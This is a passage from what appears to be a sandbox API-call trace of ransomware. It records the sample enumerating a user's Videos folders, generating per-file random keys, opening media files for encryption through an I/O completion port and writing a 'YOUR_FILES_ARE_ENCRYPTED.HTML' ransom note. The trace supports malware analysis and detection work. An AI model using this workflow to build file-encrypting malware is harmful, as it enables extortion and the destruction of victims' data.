param_1=0x4ebdda2, param_2="%02X" | out: param_1="B4") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="B9") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="9E") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="B1") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="CE") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="DD") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="88") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="58") returned 2 [0168.895] lstrcpyW (in: lpString1=0x76413b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4" [0168.895] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7631300, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.895] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7631300, lpOverlapped=0x7631300) returned 1 [0168.895] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43742e40, ftCreationTime.dwHighDateTime=0x1d7da08, ftLastAccessTime.dwLowDateTime=0x122f2b90, ftLastAccessTime.dwHighDateTime=0x1d7e54e, ftLastWriteTime.dwLowDateTime=0x122f2b90, ftLastWriteTime.dwHighDateTime=0x1d7e54e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="llqHI_L IUsBmama", cAlternateFileName="LLQHI_~1")) returned 1 [0168.895] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama") returned 47 [0168.895] GetProcessHeap () 
returned 0x270000 [0168.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.895] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama" [0168.895] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\*" [0168.895] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43742e40, ftCreationTime.dwHighDateTime=0x1d7da08, ftLastAccessTime.dwLowDateTime=0x122f2b90, ftLastAccessTime.dwHighDateTime=0x1d7e54e, ftLastWriteTime.dwLowDateTime=0x122f2b90, ftLastWriteTime.dwHighDateTime=0x1d7e54e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.895] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43742e40, ftCreationTime.dwHighDateTime=0x1d7da08, ftLastAccessTime.dwLowDateTime=0x122f2b90, ftLastAccessTime.dwHighDateTime=0x1d7e54e, ftLastWriteTime.dwLowDateTime=0x122f2b90, ftLastWriteTime.dwHighDateTime=0x1d7e54e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.895] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6425ca0, ftCreationTime.dwHighDateTime=0x1d7d7af, ftLastAccessTime.dwLowDateTime=0x921b4d10, 
ftLastAccessTime.dwHighDateTime=0x1d7da5f, ftLastWriteTime.dwLowDateTime=0x921b4d10, ftLastWriteTime.dwHighDateTime=0x1d7da5f, nFileSizeHigh=0x0, nFileSizeLow=0xf44, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="cwKqIbrhHjG18 WH.mkv", cAlternateFileName="CWKQIB~1.MKV")) returned 1 [0168.895] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\cwKqIbrhHjG18 WH.mkv") returned 68 [0168.895] lstrcmpW (lpString1="cwKqIbrhHjG18 WH.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.895] PathFindExtensionW (pszPath="cwKqIbrhHjG18 WH.mkv") returned=".mkv" [0168.895] lstrlenW (lpString=".mkv") returned 4 [0168.896] PathFindExtensionW (pszPath="cwKqIbrhHjG18 WH.mkv") returned=".mkv" [0168.896] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b400230, ftCreationTime.dwHighDateTime=0x1d7d982, ftLastAccessTime.dwLowDateTime=0x3c906cc0, ftLastAccessTime.dwHighDateTime=0x1d7dab6, ftLastWriteTime.dwLowDateTime=0x3c906cc0, ftLastWriteTime.dwHighDateTime=0x1d7dab6, nFileSizeHigh=0x0, nFileSizeLow=0x715e, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="dXc8SgpPrc-ET AvuZ8.avi", cAlternateFileName="DXC8SG~1.AVI")) returned 1 [0168.896] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi") returned 71 [0168.896] lstrcmpW (lpString1="dXc8SgpPrc-ET AvuZ8.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.896] PathFindExtensionW (pszPath="dXc8SgpPrc-ET AvuZ8.avi") returned=".avi" [0168.896] lstrlenW (lpString=".avi") returned 4 [0168.896] PathFindExtensionW (pszPath="dXc8SgpPrc-ET AvuZ8.avi") returned=".avi" [0168.896] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 
[0168.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\llqhi_l iusbmama\\dxc8sgpprc-et avuz8.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0168.896] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=29022) returned 1 [0168.896] GetProcessHeap () returned 0x270000 [0168.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7659458 [0168.900] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="35") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A8") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="CF") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="3D") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8E") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="BB") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="64") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="D5") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="61") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1B") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="89") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="65") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="8A") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="6B") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="53") 
returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="6B") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="53") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="5E") returned 2 [0168.900] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="31") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="4D") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="AF") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="CF") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="77") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B0") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="77") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E7") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="79") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="35") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="4D") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="39") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A4") returned 2 [0168.901] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="67") returned 2 [0168.901] lstrcpyW (in: lpString1=0x766950c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi" [0168.901] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, 
CompletionKey=0x7659458, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.901] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7659458, lpOverlapped=0x7659458) returned 1 [0168.902] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x598c4ef0, ftCreationTime.dwHighDateTime=0x1d7e701, ftLastAccessTime.dwLowDateTime=0xc8d341f0, ftLastAccessTime.dwHighDateTime=0x1d7e77f, ftLastWriteTime.dwLowDateTime=0xc8d341f0, ftLastWriteTime.dwHighDateTime=0x1d7e77f, nFileSizeHigh=0x0, nFileSizeLow=0x1542a, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="rU1a5NOEKgMT0KbZLa.avi", cAlternateFileName="RU1A5N~1.AVI")) returned 1 [0168.902] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi") returned 70 [0168.902] lstrcmpW (lpString1="rU1a5NOEKgMT0KbZLa.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.902] PathFindExtensionW (pszPath="rU1a5NOEKgMT0KbZLa.avi") returned=".avi" [0168.902] lstrlenW (lpString=".avi") returned 4 [0168.902] PathFindExtensionW (pszPath="rU1a5NOEKgMT0KbZLa.avi") returned=".avi" [0168.902] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\llqhi_l iusbmama\\ru1a5noekgmt0kbzla.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e0 [0168.902] GetFileSizeEx (in: hFile=0x5e0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=87082) returned 1 [0168.902] GetProcessHeap () returned 0x270000 [0168.902] RtlAllocateHeap (HeapHandle=0x270000, 
Flags=0x8, Size=0x28150) returned 0x7781160 [0168.906] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="C8") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3F") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="0E") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="40") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="83") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="92") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6D") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F4") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B4") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="CE") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="40") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="72") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D6") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4D") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F7") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="80") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="5C") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="EB") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="03") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="C9") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="77") returned 2 [0168.906] wsprintfW 
(in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="34") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="BC") returned 2 [0168.906] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F2") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0A") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="01") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A1") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="6E") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C1") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="90") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="CE") returned 2 [0168.907] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="47") returned 2 [0168.907] lstrcpyW (in: lpString1=0x7791214, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi" [0168.907] CreateIoCompletionPort (FileHandle=0x5e0, ExistingCompletionPort=0x3a0, CompletionKey=0x7781160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.907] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7781160, lpOverlapped=0x7781160) returned 1 [0168.907] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedfa3b30, ftCreationTime.dwHighDateTime=0x1d7ddfe, ftLastAccessTime.dwLowDateTime=0x63d5cdd0, ftLastAccessTime.dwHighDateTime=0x1d7e4ec, ftLastWriteTime.dwLowDateTime=0x63d5cdd0, 
ftLastWriteTime.dwHighDateTime=0x1d7e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x6cc, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="TgNXZNShVhPaImwZH9B.mp4", cAlternateFileName="TGNXZN~1.MP4")) returned 1 [0168.907] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4") returned 71 [0168.908] lstrcmpW (lpString1="TgNXZNShVhPaImwZH9B.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.908] PathFindExtensionW (pszPath="TgNXZNShVhPaImwZH9B.mp4") returned=".mp4" [0168.908] lstrlenW (lpString=".mp4") returned 4 [0168.908] PathFindExtensionW (pszPath="TgNXZNShVhPaImwZH9B.mp4") returned=".mp4" [0168.908] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\llqhi_l iusbmama\\tgnxznshvhpaimwzh9b.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0168.909] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=1740) returned 1 [0168.909] GetProcessHeap () returned 0x270000 [0168.909] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77a92b8 [0168.912] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="10") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="4A") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C3") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="95") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C9") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | 
out: param_1="33") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="0E") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="93") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0A") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1C") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CB") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D3") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F9") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="98") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="65") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F1") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="46") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="21") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="AC") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="BB") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="89") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="9B") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="96") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="FB") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="51") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="3C") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="2E") returned 2 [0168.913] wsprintfW (in: 
param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3B") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="85") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="27") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A3") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0A") returned 2 [0168.914] lstrcpyW (in: lpString1=0x77b936c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4" [0168.914] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x77a92b8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.914] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77a92b8, lpOverlapped=0x77a92b8) returned 1 [0168.914] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedfa3b30, ftCreationTime.dwHighDateTime=0x1d7ddfe, ftLastAccessTime.dwLowDateTime=0x63d5cdd0, ftLastAccessTime.dwHighDateTime=0x1d7e4ec, ftLastWriteTime.dwLowDateTime=0x63d5cdd0, ftLastWriteTime.dwHighDateTime=0x1d7e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x6cc, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="TgNXZNShVhPaImwZH9B.mp4", cAlternateFileName="TGNXZN~1.MP4")) returned 0 [0168.914] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.914] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0168.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L 
IUsBmama\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\llqhi_l iusbmama\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0168.915] WriteFile (in: hFile=0x5d8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.917] CloseHandle (hObject=0x5d8) returned 1 [0168.917] GetProcessHeap () returned 0x270000 [0168.918] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.919] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b893f0, ftCreationTime.dwHighDateTime=0x1d7d90d, ftLastAccessTime.dwLowDateTime=0xbdf76930, ftLastAccessTime.dwHighDateTime=0x1d7e425, ftLastWriteTime.dwLowDateTime=0xbdf76930, ftLastWriteTime.dwHighDateTime=0x1d7e425, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="riUpXrt01pZMn5 8ov6f", cAlternateFileName="RIUPXR~1")) returned 1 [0168.919] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f") returned 51 [0168.919] GetProcessHeap () returned 0x270000 [0168.919] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.919] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f" [0168.919] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\*" [0168.919] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b893f0, ftCreationTime.dwHighDateTime=0x1d7d90d, ftLastAccessTime.dwLowDateTime=0xbdf76930, ftLastAccessTime.dwHighDateTime=0x1d7e425, ftLastWriteTime.dwLowDateTime=0xbdf76930, ftLastWriteTime.dwHighDateTime=0x1d7e425, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.919] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 